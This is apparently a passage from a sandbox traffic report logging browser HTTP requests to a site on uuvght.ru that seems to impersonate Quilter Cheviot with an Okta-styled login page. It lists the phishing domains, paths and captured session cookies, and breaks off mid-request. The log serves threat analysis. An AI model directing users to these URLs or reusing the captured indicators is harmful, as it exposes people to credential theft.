                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=Ev.6e0aaynRUW36WCCSZGHBefEEcfHtcDODN2DdMIEA-1742311364-1.0.1.1-7kfjjN0PAsffeadubXqsJwpQppYQgTQdDasUfZsEYMvQkb0u2rtd0Y4uIJJGaHUtGpeb4vzl3gan2ZtBbl.YjjTaf4YWVCTOpkYxtMK8HJ4
                Source: global trafficHTTP traffic detected: GET /tarboz@u106ot9 HTTP/1.1Host: v36ix.szsnqp.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://quiltercheviot.uuvght.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /tarboz@u106ot9 HTTP/1.1Host: v36ix.szsnqp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /nTJ777/ HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://quiltercheviot.uuvght.ru/nTJ777/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InFnbDZlbU4rWVdzbEg1N1FwbDd2ZVE9PSIsInZhbHVlIjoiN0QzUE0zMjY5Y0xDajYwS1d1OXhyR1doZ3p2Njc5VU1ZSjFQQm9IWjI1Yy91NTFpVzRkbldCOFRNb1ZvUVI5U1NnRUNhUHZIdGpKR2dHL2doWWROTDFkYXBkR0xZd24xK29TT2k0YmVYWXNiOFVkMGlSYjU3Vm5RRXNmd1NCN0EiLCJtYWMiOiJhNDQ0MzcwMmRjZTkxOTA3NGY5MjVhY2I3YmUzZDAxNGUyOTQxMTUxZTlhNTQzNDZmYjk3NTA5OTBkZDlkMjQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjdraXFyMzhLN3U4WWwwZW5ETTNCZXc9PSIsInZhbHVlIjoiL0MyaXd0dStFb3VCQWt5d1dRUWNqbXNKT1luRlEvRFRxcXBGZlBUTWM4WENta1ZhRmhPbmQzZGcxVkk4Q0Rnc3dOOHMybGJGeitpNTNwLzJEelJEajF4MDFHWCt2c25tSUk2b082aTlob21HaHpqa2FsSWxDU1RQbWZQdk1YdkwiLCJtYWMiOiIzOWM2MGJkMjI1ZDRiZWE5MGMyMmZlZGVkOGEwNjQ4NTYxMjRlYjU0ODNmZjMxNzk2ZWNhMGJhNmNjMGMwMzNkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /tdl2unv9gDV7gebvSTx8fq6Qo8kD8UATTsu HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InFnbDZlbU4rWVdzbEg1N1FwbDd2ZVE9PSIsInZhbHVlIjoiN0QzUE0zMjY5Y0xDajYwS1d1OXhyR1doZ3p2Njc5VU1ZSjFQQm9IWjI1Yy91NTFpVzRkbldCOFRNb1ZvUVI5U1NnRUNhUHZIdGpKR2dHL2doWWROTDFkYXBkR0xZd24xK29TT2k0YmVYWXNiOFVkMGlSYjU3Vm5RRXNmd1NCN0EiLCJtYWMiOiJhNDQ0MzcwMmRjZTkxOTA3NGY5MjVhY2I3YmUzZDAxNGUyOTQxMTUxZTlhNTQzNDZmYjk3NTA5OTBkZDlkMjQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjdraXFyMzhLN3U4WWwwZW5ETTNCZXc9PSIsInZhbHVlIjoiL0MyaXd0dStFb3VCQWt5d1dRUWNqbXNKT1luRlEvRFRxcXBGZlBUTWM4WENta1ZhRmhPbmQzZGcxVkk4Q0Rnc3dOOHMybGJGeitpNTNwLzJEelJEajF4MDFHWCt2c25tSUk2b082aTlob21HaHpqa2FsSWxDU1RQbWZQdk1YdkwiLCJtYWMiOiIzOWM2MGJkMjI1ZDRiZWE5MGMyMmZlZGVkOGEwNjQ4NTYxMjRlYjU0ODNmZjMxNzk2ZWNhMGJhNmNjMGMwMzNkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/nTJ777/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkN3OFJvK0ZVYUZQb1ZEWW02OHcraGc9PSIsInZhbHVlIjoiS3gwODN1SFhSZ3o3Y3RrK0YrMWk1WDAzUFdveFhqbW0xb1pQckt2cDZJQld3cHFlaXBiTnBYTlZIbmw1cFgzclltVUZIc0g5eFdZaDA4WjRwSnp6YWswN3pTMU56ODZHNmtTc2xqMFNNcVptTW1zZnR2dElGWE1NbklmM2lxSEkiLCJtYWMiOiI2OGY5YjJmYzRkZmM3NzI5ZWQ3YjY2MTY4MGFhZmNlNDhiM2M3MDc4NTdmZGMxNzNkM2NmM2NkNzI5MjVlZWZhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlltVWVDMG1lSm5tcW90eUN2aUxRVEE9PSIsInZhbHVlIjoicTkrL20yWnJOT3E5ZllNcWdEMWY5dXJpUkl2UlZRM0RPcU5vOGpwekxOK1J4OEcyQ20vM0xwQkJhOHZQc0Z1Ym5QK3JuYWcrSEJjREtpUW9Penl2TjdLOXh3bkIyRDIrbEtZWmdwaG5YTnBDSks3U1FYTGFMZVoySkw1NGV3VmsiLCJtYWMiOiIzODExMWQ4MTYzYWYyMThhZGQ1ODRiZjI2N2NiZjY1YzQ2ZTNhZGM4Mjk2YmYxNGE1NDI3YzQzZmE4OGFhNjlhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /rq6hFLBxsRd99C5DxuUMgquYKDtkJqNXasAmjDrY34q9gy HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inl0bWlhakhvRU91NjEzOUdpS1BiUUE9PSIsInZhbHVlIjoiZ3J1MEhma3BsdGJPR1l6eXk4clVndmNob015MjRsSERWQ1pvUEtGN05ZNUpnaUlqOEJ6MnR3WXF3K0FpN1N5blhsUEZIZlh3Q1p5ZHBoemJKNUlkN2lJYkkwQmw5SFBjeDhqL0xIUDdNdlI5N1VRVUhGcjI3ajY4a1RjazRXQW0iLCJtYWMiOiJmMmQzYWU4YmFjYTUxMGJlOWRhZmYxZGUzNTM0NzNmZTc5MTI0YzVhYjZiZjdmMzIxNDg1NDc3MDdjYjUyYTc0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVtalBQUGNiclhHdmJyQW9abnJnTGc9PSIsInZhbHVlIjoidElKSW9JNGpXZ1d1VVdYT1pFSnVsZEZIQXM1eFdkQWdML0M2VDhZcC83UHdyc1FuWDNZOHgzcG1TbHhPa200d09KMURGVU5XRlVSa2J3eWE0alNNdWdTMytoNkZPNCt6YVZKMGlOKzh2d0RVbUZHTE5NL0F2eGxKTzF3WURsMFciLCJtYWMiOiI5Y2QxODk4MTE5ZDg4ZDI3MzdkMjk3OWQwYWQ2ZmI5MThmYzU1ZjU2ODdjOTE4MWNjNjU2N2MzMTJhZGUwYjU3IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://quiltercheviot.uuvght.ru/nTJ777/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inl0bWlhakhvRU91NjEzOUdpS1BiUUE9PSIsInZhbHVlIjoiZ3J1MEhma3BsdGJPR1l6eXk4clVndmNob015MjRsSERWQ1pvUEtGN05ZNUpnaUlqOEJ6MnR3WXF3K0FpN1N5blhsUEZIZlh3Q1p5ZHBoemJKNUlkN2lJYkkwQmw5SFBjeDhqL0xIUDdNdlI5N1VRVUhGcjI3ajY4a1RjazRXQW0iLCJtYWMiOiJmMmQzYWU4YmFjYTUxMGJlOWRhZmYxZGUzNTM0NzNmZTc5MTI0YzVhYjZiZjdmMzIxNDg1NDc3MDdjYjUyYTc0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVtalBQUGNiclhHdmJyQW9abnJnTGc9PSIsInZhbHVlIjoidElKSW9JNGpXZ1d1VVdYT1pFSnVsZEZIQXM1eFdkQWdML0M2VDhZcC83UHdyc1FuWDNZOHgzcG1TbHhPa200d09KMURGVU5XRlVSa2J3eWE0alNNdWdTMytoNkZPNCt6YVZKMGlOKzh2d0RVbUZHTE5NL0F2eGxKTzF3WURsMFciLCJtYWMiOiI5Y2QxODk4MTE5ZDg4ZDI3MzdkMjk3OWQwYWQ2ZmI5MThmYzU1ZjU2ODdjOTE4MWNjNjU2N2MzMTJhZGUwYjU3IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /56ybfCjabGpJyUZ8916 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /xyrN6azxUjCRpqSzcd26 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250318T152121Z&X-Amz-Expires=300&X-Amz-Signature=740f45a720998c47938f1f35aa27b630e9cecf67a7bc9d7db99a8bfda1749aba&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; 